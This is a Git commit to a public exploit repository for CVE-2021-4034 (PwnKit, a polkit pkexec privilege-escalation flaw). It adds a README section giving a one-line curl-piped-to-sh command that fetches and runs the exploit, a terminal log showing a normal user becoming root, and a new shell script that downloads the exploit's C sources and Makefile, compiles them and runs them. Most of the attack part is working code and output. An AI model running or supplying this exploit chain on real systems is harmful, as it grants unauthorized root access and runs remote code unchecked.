One-liner root

This commit is contained in:
Nicholas Ferreira 2022-01-27 10:09:47 -03:00 committed by Davide Berardi
parent 54b79d1cd1
commit 465b0f35b2
2 changed files with 34 additions and 0 deletions

View File

@ -36,3 +36,21 @@ vagrant@ubuntu-impish:~/CVE-2021-4034$
## About Polkit pkexec for Linux ## About Polkit pkexec for Linux
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission). Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).
# One command root
`curl -s https://raw.githubusercontent.com/Nickguitar/CVE-2021-4034/main/cve-2021-4034.sh | sh`
```
vagrant@ubuntu-impish:~/CVE-2021-4034$ whoami
vagrant
vagrant@ubuntu-impish:~/CVE-2021-4034$ curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh | sh
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
# whoami
root
```

16
cve-2021-4034.sh Normal file
View File

@ -0,0 +1,16 @@
#!/usr/bin/env sh
set -e
URL='https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/'
for EXPLOIT in "${URL}/cve-2021-4034.c" \
"${URL}/pwnkit.c" \
"${URL}/Makefile"
do
curl -sLO "$EXPLOIT" || wget --no-hsts -q "$EXPLOIT" -O "${EXPLOIT##*/}"
done
make
./cve-2021-4034